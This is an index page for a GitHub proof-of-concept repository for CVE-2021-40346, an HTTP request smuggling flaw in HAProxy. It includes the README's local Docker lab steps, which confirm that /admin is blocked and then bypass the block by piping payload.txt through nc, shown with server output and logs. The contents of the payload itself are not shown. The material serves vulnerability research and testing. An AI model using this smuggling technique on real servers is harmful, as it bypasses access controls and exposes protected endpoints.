Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/knqyf263/CVE-2021-40346
CVE-2021-40346 PoC (HAProxy HTTP Smuggling)
https://github.com/knqyf263/CVE-2021-40346
Last synced: about 2 months ago
JSON representation
CVE-2021-40346 PoC (HAProxy HTTP Smuggling)
- Host: GitHub
- URL: https://github.com/knqyf263/CVE-2021-40346
- Owner: knqyf263
- License: apache-2.0
- Created: 2021-09-08T22:26:19.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-09-08T22:37:15.000Z (over 3 years ago)
- Last Synced: 2024-11-20T00:42:42.070Z (about 2 months ago)
- Language: JavaScript
- Size: 5.86 KB
- Stars: 39
- Watchers: 4
- Forks: 15
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - knqyf263/CVE-2021-40346 - CVE-2021-40346 PoC (HAProxy HTTP Smuggling) (JavaScript)
README
# CVE-2021-40346
CVE-2021-40346 PoC (HAProxy HTTP Smuggling)For educational purposes only
## Setup
```
$ docker build -t cve-2021-40346 .
$ docker run --name poc -p 8000:80 -d --rm -it cve-2021-40346
4941e9f23508b497e4cbe334a75e7cdb84c83478522ed85f48db3477f97a6fb4
```## Test
Confirm `/admin` is denied.```
$ curl http://localhost:8000
hello
$ curl http://localhost:8000/admin403 Forbidden
Request forbidden by administrative rules.```
You will not see `/admin` in the log. It means the request didn't reach the backend server since HAProxy denied it.
```
$ docker logs poc
server start at port 8000
/
```Then, you can make sure it can be bypassed by payload.txt.
```
$ cat payload.txt | nc localhost 8000
HTTP/1.1 200 OK
content-type: text/plain
date: Wed, 08 Sep 2021 22:31:10 GMT
keep-alive: timeout=5
transfer-encoding: chunked6
hello0
```You will find `/admin` in the log.
```
$ docker logs poc
server start at port 8000
/
/
/admin
```